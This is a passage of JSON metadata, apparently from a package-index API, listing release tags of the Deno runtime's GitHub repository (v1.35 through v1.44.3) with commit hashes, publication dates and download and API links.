44ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","